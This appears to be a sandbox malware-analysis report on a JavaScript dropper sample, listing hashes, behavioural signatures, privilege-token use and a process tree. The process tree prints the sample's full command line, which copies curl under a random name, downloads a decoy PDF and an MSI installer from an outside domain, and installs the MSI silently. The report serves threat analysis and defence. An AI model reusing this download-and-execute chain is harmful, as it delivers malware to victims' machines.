Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
06-06-2024 02:00
Static task
static1
Behavioral task
behavioral1
Sample
N-WITHERSPOON-86707.js
Resource
win7-20231129-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
N-WITHERSPOON-86707.js
Resource
win10v2004-20240508-en
windows10-2004-x64
6 signatures
150 seconds
General
-
Target
N-WITHERSPOON-86707.js
-
Size
1KB
-
MD5
97df66f95eced4fb840fd9d706d2763d
-
SHA1
608f9e2389f4eaab66f584bd51f93ff3c3ed8a04
-
SHA256
138265fa05533c8d6c8b9bb8686e00926bf5fa6f4b0d5b9a5ade065c5180a9db
-
SHA512
2fbf85c74d3945330138d46518e34725800775644147f105deb4cbf0fdb06a4568f69fa1995d5967d95f2587b13a4b91e23524aab253a2adb58487296d156e57
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1696 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 1696 msiexec.exe Token: SeIncreaseQuotaPrivilege 1696 msiexec.exe Token: SeRestorePrivilege 1740 msiexec.exe Token: SeTakeOwnershipPrivilege 1740 msiexec.exe Token: SeSecurityPrivilege 1740 msiexec.exe Token: SeCreateTokenPrivilege 1696 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1696 msiexec.exe Token: SeLockMemoryPrivilege 1696 msiexec.exe Token: SeIncreaseQuotaPrivilege 1696 msiexec.exe Token: SeMachineAccountPrivilege 1696 msiexec.exe Token: SeTcbPrivilege 1696 msiexec.exe Token: SeSecurityPrivilege 1696 msiexec.exe Token: SeTakeOwnershipPrivilege 1696 msiexec.exe Token: SeLoadDriverPrivilege 1696 msiexec.exe Token: SeSystemProfilePrivilege 1696 msiexec.exe Token: SeSystemtimePrivilege 1696 msiexec.exe Token: SeProfSingleProcessPrivilege 1696 msiexec.exe Token: SeIncBasePriorityPrivilege 1696 msiexec.exe Token: SeCreatePagefilePrivilege 1696 msiexec.exe Token: SeCreatePermanentPrivilege 1696 msiexec.exe Token: SeBackupPrivilege 1696 msiexec.exe Token: SeRestorePrivilege 1696 msiexec.exe Token: SeShutdownPrivilege 1696 msiexec.exe Token: SeDebugPrivilege 1696 msiexec.exe Token: SeAuditPrivilege 1696 msiexec.exe Token: SeSystemEnvironmentPrivilege 1696 msiexec.exe Token: SeChangeNotifyPrivilege 1696 msiexec.exe Token: SeRemoteShutdownPrivilege 1696 msiexec.exe Token: SeUndockPrivilege 1696 msiexec.exe Token: SeSyncAgentPrivilege 1696 msiexec.exe Token: SeEnableDelegationPrivilege 1696 msiexec.exe Token: SeManageVolumePrivilege 1696 msiexec.exe Token: SeImpersonatePrivilege 1696 msiexec.exe Token: SeCreateGlobalPrivilege 1696 msiexec.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2884 wrote to memory of 3004 2884 wscript.exe 28 PID 2884 wrote to memory of 3004 2884 wscript.exe 28 PID 2884 wrote to memory of 3004 2884 wscript.exe 28 PID 3004 wrote to memory of 1696 3004 cmd.exe 30 PID 3004 wrote to memory of 1696 3004 cmd.exe 30 PID 3004 wrote to memory of 1696 3004 cmd.exe 30 PID 3004 wrote to memory of 1696 3004 cmd.exe 30 PID 3004 wrote to memory of 1696 3004 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\N-WITHERSPOON-86707.js1⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Admin\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" https://in.corpmail.one/download/pdf & "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://in.corpmail.one/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1740